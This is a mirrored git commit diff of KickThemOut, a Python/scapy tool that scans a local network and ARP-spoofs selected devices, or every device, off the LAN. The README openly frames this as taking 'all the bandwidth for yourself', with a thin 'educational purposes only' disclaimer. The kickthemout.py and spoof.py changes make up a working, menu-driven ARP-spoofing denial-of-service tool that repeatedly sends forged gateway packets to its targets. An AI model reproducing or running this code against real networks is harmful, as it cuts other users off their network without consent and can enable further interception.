mirror of
https://github.com/k4m4/kickthemout.git
synced 2024-11-29 08:24:25 +01:00
commit
1ac0f7ff2d
27
.gitignore
vendored
Normal file
27
.gitignore
vendored
Normal file
@ -0,0 +1,27 @@
|
|||||||
|
env/
|
||||||
|
build/
|
||||||
|
develop-eggs/
|
||||||
|
dist/
|
||||||
|
downloads/
|
||||||
|
eggs/
|
||||||
|
.eggs/
|
||||||
|
lib/
|
||||||
|
lib64/
|
||||||
|
parts/
|
||||||
|
sdist/
|
||||||
|
var/
|
||||||
|
*.egg-info/
|
||||||
|
*.egg
|
||||||
|
*.manifest
|
||||||
|
*.spec
|
||||||
|
pip-log.txt
|
||||||
|
pip-delete-this-directory.txt
|
||||||
|
.scrapy
|
||||||
|
target/
|
||||||
|
.python-version
|
||||||
|
venv/
|
||||||
|
ENV/
|
||||||
|
*.pyc
|
||||||
|
*.tmp
|
||||||
|
*.bak
|
||||||
|
*.cfg
|
6
.travis.yml
Normal file
6
.travis.yml
Normal file
@ -0,0 +1,6 @@
|
|||||||
|
language: python
|
||||||
|
python:
|
||||||
|
- "2.6"
|
||||||
|
- "2.7"
|
||||||
|
script:
|
||||||
|
- python -c "import kickthemout; import scan; import spoof"
|
4
CHANGES.rst
Normal file
4
CHANGES.rst
Normal file
@ -0,0 +1,4 @@
|
|||||||
|
0.1 (05.01.2017)
|
||||||
|
----------------
|
||||||
|
|
||||||
|
- Initial release.
|
2
LICENSE
2
LICENSE
@ -1,6 +1,6 @@
|
|||||||
MIT License
|
MIT License
|
||||||
|
|
||||||
Copyright (c) 2016 Nikolaos Kamarinakis
|
Copyright (c) 2017 Nikolaos Kamarinakis
|
||||||
|
|
||||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||||
of this software and associated documentation files (the "Software"), to deal
|
of this software and associated documentation files (the "Software"), to deal
|
||||||
|
50
README.rst
50
README.rst
@ -1,4 +1,52 @@
|
|||||||
KickThemOut
|
KickThemOut
|
||||||
===========
|
============
|
||||||
|
|
||||||
`KickThemOut <https://nikolaskama.me/kickthemoutproject/>`_ - **Kick Devices Off Your Network**
|
`KickThemOut <https://nikolaskama.me/kickthemoutproject/>`_ - **Kick Devices Off Your Network**
|
||||||
|
|
||||||
|
A tool to kick devices out of your network and enjoy all the bandwidth for yourself.
|
||||||
|
It allows you to select specific or all devices and ARP spoofs them off your local area network.
|
||||||
|
|
||||||
|
Compatible with Python 2.6 & 2.7.
|
||||||
|
|
||||||
|
Authors: `Nikolaos Kamarinakis <mailto:nikolaskam@gmail.com>`_ & `David Schütz <mailto:xdavid@protonmail.com>`_.
|
||||||
|
|
||||||
|
.. image:: https://nikolaskama.me/content/images/2017/01/kickthemout.png
|
||||||
|
|
||||||
|
Installation
|
||||||
|
-------------
|
||||||
|
|
||||||
|
You can download KickThemOut by cloning the `Git Repo <https://github.com/k4m4/kickthemout>`_ and simply installing its requirements::
|
||||||
|
|
||||||
|
$ git clone https://github.com/k4m4/kickthemout.git
|
||||||
|
|
||||||
|
$ cd kickthemout
|
||||||
|
|
||||||
|
$ pip install -r requirements.txt
|
||||||
|
|
||||||
|
Demo
|
||||||
|
-----
|
||||||
|
|
||||||
|
Here's a short demo:
|
||||||
|
|
||||||
|
.. image:: https://nikolaskama.me/content/images/2017/01/kickthemout_asciinema.png
|
||||||
|
:target: https://asciinema.org/a/98200?autoplay=1&loop=1
|
||||||
|
|
||||||
|
(For more demos click `here <https://asciinema.org/~k4m4>`_.)
|
||||||
|
|
||||||
|
Disclaimer
|
||||||
|
-----------
|
||||||
|
|
||||||
|
KickThemOut is provided as is under the MIT Licence (as stated below).
|
||||||
|
It is built for educational purposes only. If you choose to use it otherwise, the developers will not be held responsible.
|
||||||
|
In brief, do not use it with evil intent.
|
||||||
|
|
||||||
|
License
|
||||||
|
--------
|
||||||
|
|
||||||
|
Copyright (c) 2017 by `Nikolaos Kamarinakis <mailto:nikolaskam@gmail.com>`_ & `David Schütz <mailto:xdavid@protonmail.com>`_. Some rights reserved.
|
||||||
|
|
||||||
|
KickThemOut is under the terms of the `MIT License <https://www.tldrlegal.com/l/mit>`_, following all clarifications stated in the `license file <https://raw.githubusercontent.com/k4m4/kickthemout/master/LICENSE>`_.
|
||||||
|
|
||||||
|
|
||||||
|
For more information head over to the `official project page <https://nikolaskama.me/kickthemoutproject/>`_.
|
||||||
|
You can also go ahead and email me anytime at **nikolaskam{at}gmail{dot}com** or David at **xdavid{at}protonmail{dot}com**.
|
||||||
|
129
kickthemout.py
129
kickthemout.py
@ -9,16 +9,18 @@ See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import time, os, sys, logging, math
|
import time, os, sys, logging, math
|
||||||
import scan, spoof
|
|
||||||
from time import sleep
|
from time import sleep
|
||||||
import urllib2 as urllib
|
import urllib2 as urllib
|
||||||
|
|
||||||
|
|
||||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy!
|
|
||||||
from scapy.all import *
|
|
||||||
|
|
||||||
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
|
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
|
||||||
|
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy!
|
||||||
|
try:
|
||||||
|
from scapy.all import *
|
||||||
|
import scan, spoof
|
||||||
|
except:
|
||||||
|
print("\n{0}ERROR: Requirements have not been properly satisfied. Please try running:\n\t{1}$ sudo pip install -r requirements.txt{2}").format(RED, GREEN, END)
|
||||||
|
print("\n{0}If you still get the same error, please submit an issue here:\n\t{1}https://github.com/k4m4/kickthemout/issues/\n{2}").format(RED, BLUE, END)
|
||||||
|
raise SystemExit
|
||||||
|
|
||||||
def heading():
|
def heading():
|
||||||
sys.stdout.write(GREEN + """
|
sys.stdout.write(GREEN + """
|
||||||
@ -29,12 +31,10 @@ def heading():
|
|||||||
█ ▐ ▀███▀ █ ▀ █ ▀███▀ █ █▄ ▄█ ▀
|
█ ▐ ▀███▀ █ ▀ █ ▀███▀ █ █▄ ▄█ ▀
|
||||||
▀ ▀ ▀ ▀ ▀▀▀
|
▀ ▀ ▀ ▀ ▀▀▀
|
||||||
""" + END + BLUE +
|
""" + END + BLUE +
|
||||||
'\n' + '{0}Kick Devices Off Your LAN ({1}KickThemOut{2}){3}'.format(YELLOW, RED, YELLOW,
|
'\n' + '{0}Kick Devices Off Your LAN ({1}KickThemOut{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(98) +
|
||||||
BLUE).center(88) +
|
|
||||||
'\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}) & {0}David Schütz ({1}xdavidhu{2}){3}'.format(
|
'\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}) & {0}David Schütz ({1}xdavidhu{2}){3}'.format(
|
||||||
YELLOW, RED, YELLOW, BLUE).center(67) +
|
YELLOW, RED, YELLOW, BLUE).center(111) +
|
||||||
'\n' + 'Version: {0}0.1{1}\n'.format(YELLOW, END).center(77))
|
'\n' + 'Version: {0}0.1{1}\n'.format(YELLOW, END).center(86))
|
||||||
|
|
||||||
|
|
||||||
def optionBanner():
|
def optionBanner():
|
||||||
print('\nChoose option from menu:\n')
|
print('\nChoose option from menu:\n')
|
||||||
@ -47,22 +47,19 @@ def optionBanner():
|
|||||||
sleep(0.2)
|
sleep(0.2)
|
||||||
print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE)
|
print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE)
|
||||||
|
|
||||||
|
|
||||||
def scanNetwork():
|
|
||||||
global hostsList
|
|
||||||
hostsList = scan.scanNetwork()
|
|
||||||
regenOnlineIPs()
|
|
||||||
|
|
||||||
def regenOnlineIPs():
|
def regenOnlineIPs():
|
||||||
global onlineIPs
|
global onlineIPs
|
||||||
global defaultGatewayMac
|
global defaultGatewayMac
|
||||||
|
|
||||||
onlineIPs = []
|
onlineIPs = []
|
||||||
for host in hostsList:
|
for host in hostsList:
|
||||||
onlineIPs.append(host[0])
|
onlineIPs.append(host[0])
|
||||||
if host[0] == defaultGatewayIP:
|
if host[0] == defaultGatewayIP:
|
||||||
defaultGatewayMac = host[1]
|
defaultGatewayMac = host[1]
|
||||||
|
|
||||||
|
def scanNetwork():
|
||||||
|
global hostsList
|
||||||
|
hostsList = scan.scanNetwork()
|
||||||
|
regenOnlineIPs()
|
||||||
|
|
||||||
def kickoneoff():
|
def kickoneoff():
|
||||||
os.system("clear||cls")
|
os.system("clear||cls")
|
||||||
@ -71,26 +68,25 @@ def kickoneoff():
|
|||||||
scanNetwork()
|
scanNetwork()
|
||||||
|
|
||||||
print("Online IPs: ")
|
print("Online IPs: ")
|
||||||
|
|
||||||
for i in range(len(onlineIPs)):
|
for i in range(len(onlineIPs)):
|
||||||
mac = ""
|
mac = ""
|
||||||
for host in hostsList:
|
for host in hostsList:
|
||||||
if host[0] == onlineIPs[i]:
|
if host[0] == onlineIPs[i]:
|
||||||
mac = host[1]
|
mac = host[1]
|
||||||
vendor = resolveMac(mac)
|
vendor = resolveMac(mac)
|
||||||
print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t"+ vendor + "\n{4}").format(YELLOW, WHITE, RED, GREEN, END)
|
print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t"+ vendor + "{4}").format(YELLOW, WHITE, RED, GREEN, END)
|
||||||
|
|
||||||
canBreak = False
|
canBreak = False
|
||||||
while not canBreak:
|
while not canBreak:
|
||||||
try:
|
try:
|
||||||
choice = int(raw_input("\nChoose a target: "))
|
choice = int(raw_input("\nChoose a target: "))
|
||||||
|
one_target_ip = onlineIPs[choice]
|
||||||
canBreak = True
|
canBreak = True
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
return
|
return
|
||||||
except:
|
except:
|
||||||
print("{0}[!] Please enter a number!{1}").format(RED, END)
|
print("\n{0}ERROR: Please enter a number from the list!{1}").format(RED, END)
|
||||||
|
|
||||||
one_target_ip = onlineIPs[choice]
|
|
||||||
one_target_mac = ""
|
one_target_mac = ""
|
||||||
for host in hostsList:
|
for host in hostsList:
|
||||||
if host[0] == one_target_ip:
|
if host[0] == one_target_ip:
|
||||||
@ -99,20 +95,21 @@ def kickoneoff():
|
|||||||
print("\nIP address is not up. Please try again.")
|
print("\nIP address is not up. Please try again.")
|
||||||
return
|
return
|
||||||
|
|
||||||
print("\n{0}Target mac => '{1}" + one_target_mac + "{2}'{3}\n").format(GREEN, RED, GREEN, END)
|
print("\n{0}Target: {1}" + one_target_ip).format(GREEN, END)
|
||||||
print("{0}Spoofing started... {1}\n").format(GREEN, END)
|
|
||||||
|
print("\n{0}Spoofing started... {1}").format(GREEN, END)
|
||||||
try:
|
try:
|
||||||
while True:
|
while True:
|
||||||
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac)
|
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac)
|
||||||
time.sleep(15)
|
time.sleep(10)
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END)
|
print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END)
|
||||||
rearp = 1
|
reArp = 1
|
||||||
while rearp != 10:
|
while reArp != 10:
|
||||||
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, one_target_ip, one_target_mac)
|
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, one_target_ip, one_target_mac)
|
||||||
rearp = rearp + 1
|
reArp += 1
|
||||||
time.sleep(0.5)
|
time.sleep(0.5)
|
||||||
print("\n{0}Re-arped{1} target.{2}").format(RED, GREEN, END)
|
print("{0}Re-arped{1} target successfully.{2}").format(RED, GREEN, END)
|
||||||
|
|
||||||
|
|
||||||
def kicksomeoff():
|
def kicksomeoff():
|
||||||
@ -122,30 +119,30 @@ def kicksomeoff():
|
|||||||
scanNetwork()
|
scanNetwork()
|
||||||
|
|
||||||
print("Online IPs: ")
|
print("Online IPs: ")
|
||||||
|
|
||||||
for i in range(len(onlineIPs)):
|
for i in range(len(onlineIPs)):
|
||||||
mac = ""
|
mac = ""
|
||||||
for host in hostsList:
|
for host in hostsList:
|
||||||
if host[0] == onlineIPs[i]:
|
if host[0] == onlineIPs[i]:
|
||||||
mac = host[1]
|
mac = host[1]
|
||||||
vendor = resolveMac(mac)
|
vendor = resolveMac(mac)
|
||||||
print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t" + vendor + "\n{4}").format(YELLOW, WHITE,
|
print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t" + vendor + "{4}").format(YELLOW, WHITE, RED, GREEN, END)
|
||||||
RED, GREEN, END)
|
|
||||||
|
|
||||||
canBreak = False
|
canBreak = False
|
||||||
while not canBreak:
|
while not canBreak:
|
||||||
try:
|
try:
|
||||||
choice = raw_input("\nChoose the targets (separate by a ','): ")
|
choice = raw_input("\nChoose devices to target(comma-separated): ")
|
||||||
|
if ',' in choice:
|
||||||
|
some_targets = choice.split(",")
|
||||||
canBreak = True
|
canBreak = True
|
||||||
|
else:
|
||||||
|
print("\n{0}ERROR: Please select more than 1 devices from the list.{1}\n").format(RED, END)
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
return
|
return
|
||||||
|
|
||||||
some_targets = choice.split(",")
|
|
||||||
|
|
||||||
some_ipList = ""
|
some_ipList = ""
|
||||||
for i in some_targets:
|
for i in some_targets:
|
||||||
try:
|
try:
|
||||||
some_ipList = some_ipList + GREEN + "'" + RED + onlineIPs[int(i)] + GREEN + "', "
|
some_ipList += GREEN + "'" + RED + onlineIPs[int(i)] + GREEN + "', "
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
return
|
return
|
||||||
except:
|
except:
|
||||||
@ -155,7 +152,7 @@ def kicksomeoff():
|
|||||||
|
|
||||||
print("\n{0}Targets: {1}" + some_ipList).format(GREEN, END)
|
print("\n{0}Targets: {1}" + some_ipList).format(GREEN, END)
|
||||||
|
|
||||||
print("\n{0}Spoofing started... {1}\n").format(GREEN, END)
|
print("\n{0}Spoofing started... {1}").format(GREEN, END)
|
||||||
try:
|
try:
|
||||||
while True:
|
while True:
|
||||||
for i in some_targets:
|
for i in some_targets:
|
||||||
@ -163,20 +160,19 @@ def kicksomeoff():
|
|||||||
for host in hostsList:
|
for host in hostsList:
|
||||||
if host[0] == ip:
|
if host[0] == ip:
|
||||||
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
|
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
|
||||||
time.sleep(15)
|
time.sleep(10)
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
|
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
|
||||||
rearp = 1
|
reArp = 1
|
||||||
while rearp != 10:
|
while reArp != 10:
|
||||||
for i in some_targets:
|
for i in some_targets:
|
||||||
ip = onlineIPs[int(i)]
|
ip = onlineIPs[int(i)]
|
||||||
for host in hostsList:
|
for host in hostsList:
|
||||||
if host[0] == ip:
|
if host[0] == ip:
|
||||||
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
|
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
|
||||||
rearp = rearp + 1
|
reArp += 1
|
||||||
time.sleep(0.5)
|
time.sleep(0.5)
|
||||||
print("\n{0}Re-arped{1} targets.{2}").format(RED, GREEN, END)
|
print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END)
|
||||||
|
|
||||||
|
|
||||||
def kickalloff():
|
def kickalloff():
|
||||||
os.system("clear||cls")
|
os.system("clear||cls")
|
||||||
@ -193,66 +189,61 @@ def kickalloff():
|
|||||||
vendor = resolveMac(mac)
|
vendor = resolveMac(mac)
|
||||||
print(str(" {0}"+ str(onlineIPs[i]) + "{1}\t" + vendor + "{2}").format(RED, GREEN, END))
|
print(str(" {0}"+ str(onlineIPs[i]) + "{1}\t" + vendor + "{2}").format(RED, GREEN, END))
|
||||||
|
|
||||||
print("\n{0}Spoofing started... {1}\n").format(GREEN, END)
|
print("\n{0}Spoofing started... {1}").format(GREEN, END)
|
||||||
try:
|
try:
|
||||||
reScan = 0
|
reScan = 0
|
||||||
while True:
|
while True:
|
||||||
for host in hostsList:
|
for host in hostsList:
|
||||||
if host[0] != defaultGatewayIP:
|
if host[0] != defaultGatewayIP:
|
||||||
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
|
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
|
||||||
reScan = reScan + 1
|
reScan += 1
|
||||||
if reScan == 4:
|
if reScan == 4:
|
||||||
reScan = 0
|
reScan = 0
|
||||||
scanNetwork()
|
scanNetwork()
|
||||||
time.sleep(15)
|
time.sleep(10)
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
|
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
|
||||||
rearp = 1
|
reArp = 1
|
||||||
while rearp != 10:
|
while reArp != 10:
|
||||||
for host in hostsList:
|
for host in hostsList:
|
||||||
if host[0] != defaultGatewayIP:
|
if host[0] != defaultGatewayIP:
|
||||||
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
|
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
|
||||||
rearp = rearp + 1
|
reArp += 1
|
||||||
time.sleep(0.5)
|
time.sleep(0.5)
|
||||||
print("\n{0}Re-arped{1} targets.{2}").format(RED, GREEN, END)
|
print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END)
|
||||||
|
|
||||||
|
|
||||||
def getDefaultInterface():
|
def getDefaultInterface():
|
||||||
def long2net(arg):
|
def long2net(arg):
|
||||||
if (arg <= 0 or arg >= 0xFFFFFFFF):
|
if (arg <= 0 or arg >= 0xFFFFFFFF):
|
||||||
raise ValueError("illegal netmask value", hex(arg))
|
raise ValueError("illegal netmask value", hex(arg))
|
||||||
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
|
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
|
||||||
|
|
||||||
def to_CIDR_notation(bytes_network, bytes_netmask):
|
def to_CIDR_notation(bytes_network, bytes_netmask):
|
||||||
network = scapy.utils.ltoa(bytes_network)
|
network = scapy.utils.ltoa(bytes_network)
|
||||||
netmask = long2net(bytes_netmask)
|
netmask = long2net(bytes_netmask)
|
||||||
net = "%s/%s" % (network, netmask)
|
net = "%s/%s" % (network, netmask)
|
||||||
if netmask < 16:
|
if netmask < 16:
|
||||||
return None
|
return None
|
||||||
|
|
||||||
return net
|
return net
|
||||||
|
|
||||||
for network, netmask, _, interface, address in scapy.config.conf.route.routes:
|
for network, netmask, _, interface, address in scapy.config.conf.route.routes:
|
||||||
|
|
||||||
# skip loopback network and default gw
|
|
||||||
if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
|
if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if netmask <= 0 or netmask == 0xFFFFFFFF:
|
if netmask <= 0 or netmask == 0xFFFFFFFF:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
net = to_CIDR_notation(network, netmask)
|
net = to_CIDR_notation(network, netmask)
|
||||||
|
|
||||||
if interface != scapy.config.conf.iface:
|
if interface != scapy.config.conf.iface:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if net:
|
if net:
|
||||||
return interface
|
return interface
|
||||||
|
|
||||||
|
|
||||||
def getGatewayIP():
|
def getGatewayIP():
|
||||||
|
try:
|
||||||
getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
|
getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
|
||||||
return getGateway_p.src
|
return getGateway_p.src
|
||||||
|
except:
|
||||||
|
print("\n{0}ERROR: Gateway IP could not be obtained. Please enter IP manually.{1}\n").format(RED, END)
|
||||||
|
header = ('{0}kickthemout{1}> {2}Enter Gateway IP {3}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END))
|
||||||
|
gatewayIP = raw_input(header)
|
||||||
|
return gatewayIP
|
||||||
|
|
||||||
def resolveMac(mac):
|
def resolveMac(mac):
|
||||||
try:
|
try:
|
||||||
@ -264,7 +255,7 @@ def resolveMac(mac):
|
|||||||
vendor = vendor[:25]
|
vendor = vendor[:25]
|
||||||
return vendor
|
return vendor
|
||||||
except:
|
except:
|
||||||
return "RESOLVING_ERROR"
|
return "N/A"
|
||||||
|
|
||||||
def main():
|
def main():
|
||||||
|
|
||||||
@ -272,9 +263,8 @@ def main():
|
|||||||
|
|
||||||
print(
|
print(
|
||||||
"\n{0}Using interface '{1}" + defaultInterface + "{2}' with mac address '{3}" + defaultInterfaceMac + "{4}'.\nGateway IP: '{5}"
|
"\n{0}Using interface '{1}" + defaultInterface + "{2}' with mac address '{3}" + defaultInterfaceMac + "{4}'.\nGateway IP: '{5}"
|
||||||
+ defaultGatewayIP + "{6}'. {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED,
|
+ defaultGatewayIP + "{6}' --> {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN,
|
||||||
GREEN, RED, GREEN, RED,
|
RED, GREEN, RED, GREEN, END)
|
||||||
GREEN, END)
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
|
||||||
@ -291,23 +281,19 @@ def main():
|
|||||||
raise SystemExit
|
raise SystemExit
|
||||||
elif choice == '1':
|
elif choice == '1':
|
||||||
kickoneoff()
|
kickoneoff()
|
||||||
# EXECUTE kickoneoff FUNCTION (SCAN & PARSE)
|
|
||||||
elif choice == '2':
|
elif choice == '2':
|
||||||
kicksomeoff()
|
kicksomeoff()
|
||||||
# EXECUTE kicksomeoff FUNCTION
|
|
||||||
elif choice == '3':
|
elif choice == '3':
|
||||||
kickalloff()
|
kickalloff()
|
||||||
# EXECUTE kickalloff FUNCTION (FF:FF:FF:FF:FF:FF)
|
|
||||||
elif choice.upper() == 'CLEAR':
|
elif choice.upper() == 'CLEAR':
|
||||||
os.system("clear||cls")
|
os.system("clear||cls")
|
||||||
# else:
|
else:
|
||||||
# print('*INVALID OPTION*')
|
print("\n{0}ERROR: Please select a valid option.{1}\n").format(RED, END)
|
||||||
|
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
print('\n\n{0}Thanks for dropping by.'
|
print('\n\n{0}Thanks for dropping by.'
|
||||||
'\nCatch ya later!{1}').format(GREEN, END)
|
'\nCatch ya later!{1}').format(GREEN, END)
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
|
|
||||||
defaultInterface = getDefaultInterface()
|
defaultInterface = getDefaultInterface()
|
||||||
@ -315,5 +301,4 @@ if __name__ == '__main__':
|
|||||||
defaultInterfaceMac = get_if_hwaddr(defaultInterface)
|
defaultInterfaceMac = get_if_hwaddr(defaultInterface)
|
||||||
scanNetwork()
|
scanNetwork()
|
||||||
|
|
||||||
|
|
||||||
main()
|
main()
|
||||||
|
1
requirements.txt
Normal file
1
requirements.txt
Normal file
@ -0,0 +1 @@
|
|||||||
|
scapy
|
6
scan.py
6
scan.py
@ -1,9 +1,11 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
# -.- coding: utf-8 -.-
|
# -.- coding: utf-8 -.-
|
||||||
# scan.py
|
# scan.py
|
||||||
# author: Benedikt Waldvogel
|
# author: Benedikt Waldvogel (MIT Licensed)
|
||||||
# edited by: k4m4 & xdavidhu
|
# edited by: k4m4 & xdavidhu
|
||||||
|
|
||||||
|
import logging
|
||||||
|
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
|
||||||
import scapy.config, scapy.layers.l2, scapy.route, socket, math, errno
|
import scapy.config, scapy.layers.l2, scapy.route, socket, math, errno
|
||||||
|
|
||||||
def scanNetwork():
|
def scanNetwork():
|
||||||
@ -13,7 +15,6 @@ def scanNetwork():
|
|||||||
raise ValueError("illegal netmask value", hex(arg))
|
raise ValueError("illegal netmask value", hex(arg))
|
||||||
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
|
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
|
||||||
|
|
||||||
|
|
||||||
def to_CIDR_notation(bytes_network, bytes_netmask):
|
def to_CIDR_notation(bytes_network, bytes_netmask):
|
||||||
network = scapy.utils.ltoa(bytes_network)
|
network = scapy.utils.ltoa(bytes_network)
|
||||||
netmask = long2net(bytes_netmask)
|
netmask = long2net(bytes_netmask)
|
||||||
@ -23,7 +24,6 @@ def scanNetwork():
|
|||||||
|
|
||||||
return net
|
return net
|
||||||
|
|
||||||
|
|
||||||
def scan_and_print_neighbors(net, interface, timeout=1):
|
def scan_and_print_neighbors(net, interface, timeout=1):
|
||||||
hostsList = []
|
hostsList = []
|
||||||
try:
|
try:
|
||||||
|
4
spoof.py
4
spoof.py
@ -8,7 +8,8 @@ Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (
|
|||||||
See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
|
See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import sys
|
import sys, logging
|
||||||
|
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
|
||||||
from scapy.all import (
|
from scapy.all import (
|
||||||
get_if_hwaddr,
|
get_if_hwaddr,
|
||||||
getmacbyip,
|
getmacbyip,
|
||||||
@ -17,7 +18,6 @@ from scapy.all import (
|
|||||||
sendp
|
sendp
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
|
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
|
||||||
ether = Ether()
|
ether = Ether()
|
||||||
ether.src = my_mac
|
ether.src = my_mac
|
||||||
|
Loading…
Reference in New Issue
Block a user